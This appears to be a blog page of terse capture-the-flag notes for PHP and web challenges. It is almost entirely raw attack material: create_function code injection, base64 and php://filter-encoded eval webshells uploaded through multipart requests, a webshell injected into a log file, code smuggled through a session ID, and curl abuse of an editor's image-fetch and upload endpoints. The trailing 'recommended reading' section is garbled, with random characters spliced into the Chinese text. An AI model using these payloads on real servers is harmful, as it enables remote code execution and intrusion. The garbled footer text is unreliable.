[codebreaking.tricking.io] 1-4 notes

view-source:http://51.158.75.42:8087/?action=\create_function&arg=};var_dump(glob(%22../*%22));function%20a(){
image.png
>>> "<?php @eval($_GET['c']);var_dump(1);?>".encode("base64")
'PD9waHAgQGV2YWwoJF9HRVRbJ2MnXSk7dmFyX2R1bXAoMSk7Pz4=\n'
>>> 
POST /index.php HTTP/1.1
Host: 127.0.0.1:9090
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.1
Content-Length: 192
Content-Type: multipart/form-data; boundary=ac98ccfcbed08b2291999b0ff480d138

--ac98ccfcbed08b2291999b0ff480d138
Content-Disposition: form-data; name="file"; filename="file"

PD9waHAgQGV2YWwoJF9HRVRbJ2MnXSk7dmFyX2R1bXAoMSk7Pz4=
--ac98ccfcbed08b2291999b0ff480d138--

POST /index.php HTTP/1.1
Host: 127.0.0.1:9090
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.1
Content-Length: 205
Content-Type: multipart/form-data; boundary=ac98ccfcbed08b2291999b0ff480d138

--ac98ccfcbed08b2291999b0ff480d138
Content-Disposition: form-data; name="file"; filename="file"

<?=
include "php://filter/convert.base64-decode/resource=1.php";
--ac98ccfcbed08b2291999b0ff480d138--

view-source:http://51.158.75.42:8088/data/04445c51df9a9db8c23eab9e201887cf/9.php?c=var_dump(glob(%22../*%22));
image.png
???
<script language="php">
eval($_POST[only]);
</script>
POST /index.php HTTP/1.1
Host: 123.207.40.26:60000
Content-Length: 105
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://127.0.0.1:9090/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en;q=0.8,zh-CN;q=0.7
Cookie: indent_type=space; space_units=4; keymap=sublime; csrftoken=9Ky4QNPtX829j5rQWdDVHhDwVLTO4XUQkS7nHpl4wAZXrnvB7DhwBcGJjPrB8HEi; sessionid=3abaex90lt9kmrhn0fkyhv95wypznisd
Connection: close

domain=%3c%3f%70%68%70%0a%65%76%61%6c%28%24%5f%47%45%54%5b%63%5d%29%3b%64%69%65%28%29%3b%3f%3e&log=.php/.
image.png
// steams.c 1738
    for (p = path; isalnum((int)*p) || *p == '+' || *p == '-' || *p == '.'; p++) {
        n++;
    }
POST http://php/index.php HTTP/1.1
Host: 127.0.0.1:60000
Content-Length: 114
Cache-Control: max-age=0
Origin: http://127.0.0.1:60000
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://127.0.0.1:60000/
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en;q=0.8,zh-CN;q=0.7
Cookie: indent_type=space; space_units=4; keymap=sublime; csrftoken=9Ky4QNPtX829j5rQWdDVHhDwVLTO4XUQkS7nHpl4wAZXrnvB7DhwBcGJjPrB8HEi; sessionid=gAN9cQAu:1gQKO1:nz0EZkHVizd7Wbp0FMJt-DDiF9o
Connection: close

domain=PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2MnXSk7Pz4.com.&log=://filter/write=convert.base64-decode/resource=index.php/.
image.png

$_SERVER['SERVER_NAME'] 可以偽造

GET /?code=var_dump(hex2bin(session_id(session_start()))); HTTP/1.1
Host: 51.158.75.42:8084
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
DNT: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en;q=0.8,zh-CN;q=0.7
Cookie: PHPSESSID=7661725f64756d7028676c6f6228222e2e2f2a2229293b
Connection: close


image.png
image.png
My name is {'wsgi.errors': <gunicorn.http.wsgi.WSGIErrorsWrapper object at 0xffff9adc7e80>, 'wsgi.version': (1, 0), 'wsgi.multithread': True, 'wsgi.multiprocess': True, 'wsgi.run_once': False, 'wsgi.file_wrapper': <class 'gunicorn.http.wsgi.FileWrapper'>, 'SERVER_SOFTWARE': 'gunicorn/19.9.0', 'wsgi.input': <gunicorn.http.body.Body object at 0xffff9ad82e10>, 'gunicorn.socket': <gevent._socket3.socket object, fd=11, family=2, type=1, proto=6>, 'REQUEST_METHOD': 'GET', 'QUERY_STRING': '', 'RAW_URI': '/', 'SERVER_PROTOCOL': 'HTTP/1.0', 'HTTP_HOST': '51.158.73.123', 'HTTP_X_FORWARDED_PROTO': 'http', 'HTTP_X_FORWARDED_FOR': '219.217.246.194', 'HTTP_CONNECTION': 'close', 'HTTP_CACHE_CONTROL': 'max-age=0', 'HTTP_UPGRADE_INSECURE_REQUESTS': '1', 'HTTP_DNT': '1', 'HTTP_USER_AGENT': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36', 'HTTP_ACCEPT': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'HTTP_REFERER': 'http://51.158.73.123:8083/login/?next=/', 'HTTP_ACCEPT_ENCODING': 'gzip, deflate', 'HTTP_ACCEPT_LANGUAGE': 'zh,en-US;q=0.9,en;q=0.8,zh-CN;q=0.7', 'HTTP_COOKIE': 'thejs.session=s%3AWdR8Pze5g-A8pPL9M1i07I_2s0DnbTDz.oG7bVoS265hR8KzjDZNPHW3ms3cukA7aJiwjhnl41bo; csrftoken=kiKTZQl4VO9vf0yzf1vd0V2SdJmweyzwSaPTCYN7MP6MP1hX85Zg33YVuNKi9clQ; sessionid=.eJxVjLEOgjAUAIuomzHxK3BpoA2ls7v728h7tAhq2pTS0cRPFxMW1rvLffNPYAWcGGMtpnloU7RTO5qQQbYwHXZw2TrC7mWdCTlcF2Ge6B6ed97N00j8n_G1iPzujX3f1n4P5-1owDiEAxQLJUEVyVISqdpSXwmpS1RCV6W0TaOxFrKvlerCMfEfqC00ww:1gQKej:eEilnTramvvogvoJ9kh5gRGZyAc', 'wsgi.url_scheme': 'http', 'REMOTE_ADDR': '172.27.0.3', 'REMOTE_PORT': '53870', 'SERVER_NAME': '0.0.0.0', 'SERVER_PORT': '8000', 'PATH_INFO': '/', 'SCRIPT_NAME': '', 'CSRF_COOKIE': 'kiKTZQl4VO9vf0yzf1vd0V2SdJmweyzwSaPTCYN7MP6MP1hX85Zg33YVuNKi9clQ'}
image.png
?  ~ curl -X POST 'http://51.158.73.123:8080/server/editor?action=Catchimage' -d 'source[]=http://img.baidu.com/img/logo-zhidao.gif'
{"state":"SUCCESS","list":[{"url":"\/upload\/image\/b6b51ff26899674cb3aa3fb57783e4dd\/201811\/24\/50aaff118c62275ad57a.gif","source":"http:\/\/img.baidu.com\/img\/logo-zhidao.gif","state":"SUCCESS"}]}  
http://51.158.73.123:8080/server/editor?action=Catchimage
?  Desktop cat 50aaff118c62275ad57a.gif | curl -F 'upfile=@-' "http://51.158.73.123:8080/server/editor?action=UploadImage"
{"state":"SUCCESS","url":"\/upload\/image\/b6b51ff26899674cb3aa3fb57783e4dd\/201811\/24\/4003f3ad55c4a759f0bd.gif","title":"-","original":"-"}%        
?  Desktop cat index.php | curl -F 'upfile=@-' "http://51.158.73.123:8080/server/editor?action=UploadImage"
{"upfile":["The upfile must be an image.","The upfile must be a file of type: png, jpg, jpeg, gif, bmp."]}%         
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末悲敷,一起剝皮案震驚了整個(gè)濱河市阅仔,隨后出現(xiàn)的幾起案子闪萄,更是在濱河造成了極大的恐慌脱货,老刑警劉巖舌劳,帶你破解...
    沈念sama閱讀 218,284評(píng)論 6 506
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件簇捍,死亡現(xiàn)場(chǎng)離奇詭異盛撑,居然都是意外死亡涧卵,警方通過(guò)查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,115評(píng)論 3 395
  • 文/潘曉璐 我一進(jìn)店門(mén)圾浅,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)掠手,“玉大人,你說(shuō)我怎么就攤上這事狸捕∨绺耄” “怎么了?”我有些...
    開(kāi)封第一講書(shū)人閱讀 164,614評(píng)論 0 354
  • 文/不壞的土叔 我叫張陵灸拍,是天一觀的道長(zhǎng)做祝。 經(jīng)常有香客問(wèn)我砾省,道長(zhǎng),這世上最難降的妖魔是什么混槐? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 58,671評(píng)論 1 293
  • 正文 為了忘掉前任编兄,我火速辦了婚禮,結(jié)果婚禮上声登,老公的妹妹穿的比我還像新娘狠鸳。我一直安慰自己,他們只是感情好悯嗓,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,699評(píng)論 6 392
  • 文/花漫 我一把揭開(kāi)白布件舵。 她就那樣靜靜地躺著,像睡著了一般脯厨。 火紅的嫁衣襯著肌膚如雪铅祸。 梳的紋絲不亂的頭發(fā)上,一...
    開(kāi)封第一講書(shū)人閱讀 51,562評(píng)論 1 305
  • 那天俄认,我揣著相機(jī)與錄音个少,去河邊找鬼。 笑死眯杏,一個(gè)胖子當(dāng)著我的面吹牛夜焦,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播岂贩,決...
    沈念sama閱讀 40,309評(píng)論 3 418
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼茫经,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼!你這毒婦竟也來(lái)了萎津?” 一聲冷哼從身側(cè)響起卸伞,我...
    開(kāi)封第一講書(shū)人閱讀 39,223評(píng)論 0 276
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎锉屈,沒(méi)想到半個(gè)月后荤傲,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,668評(píng)論 1 314
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡颈渊,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,859評(píng)論 3 336
  • 正文 我和宋清朗相戀三年遂黍,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片俊嗽。...
    茶點(diǎn)故事閱讀 39,981評(píng)論 1 348
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡雾家,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出绍豁,到底是詐尸還是另有隱情芯咧,我是刑警寧澤,帶...
    沈念sama閱讀 35,705評(píng)論 5 347
  • 正文 年R本政府宣布,位于F島的核電站敬飒,受9級(jí)特大地震影響邪铲,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜驶拱,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,310評(píng)論 3 330
  • 文/蒙蒙 一霜浴、第九天 我趴在偏房一處隱蔽的房頂上張望晶衷。 院中可真熱鬧蓝纲,春花似錦、人聲如沸晌纫。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 31,904評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)锹漱。三九已至箭养,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間哥牍,已是汗流浹背毕泌。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 33,023評(píng)論 1 270
  • 我被黑心中介騙來(lái)泰國(guó)打工, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留嗅辣,地道東北人撼泛。 一個(gè)月前我還...
    沈念sama閱讀 48,146評(píng)論 3 370
  • 正文 我出身青樓,卻偏偏與公主長(zhǎng)得像澡谭,于是被迫代替她去往敵國(guó)和親愿题。 傳聞我的和親對(duì)象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,933評(píng)論 2 355

推薦閱讀更多精彩內(nèi)容

  • Spring Cloud為開(kāi)發(fā)人員提供了快速構(gòu)建分布式系統(tǒng)中一些常見(jiàn)模式的工具(例如配置管理蛙奖,服務(wù)發(fā)現(xiàn)潘酗,斷路器,智...
    卡卡羅2017閱讀 134,657評(píng)論 18 139
  • 1.ios高性能編程 (1).內(nèi)層 最小的內(nèi)層平均值和峰值(2).耗電量 高效的算法和數(shù)據(jù)結(jié)構(gòu)(3).初始化時(shí)...
    歐辰_OSR閱讀 29,386評(píng)論 8 265
  • 每晚都會(huì)做無(wú)數(shù)個(gè)夢(mèng)雁仲,醒來(lái)記得的卻稀少仔夺,昨夜夢(mèng)中一景卻清晰尤在,夢(mèng)中自己一襲白衣攒砖,頭發(fā)全無(wú)缸兔,手中拿著高腳玻璃杯,杯中...
    山和工坊閱讀 188評(píng)論 1 1
  • the1special閱讀 268評(píng)論 2 2
  • 世界寬廣祭衩,大到行走不行灶体,世界又是如此之小,小到和過(guò)往一再重逢掐暮。 記得第一次看到她是在他剛來(lái)不久蝎抽,在他...
    煙花雨下的諾言閱讀 128評(píng)論 0 0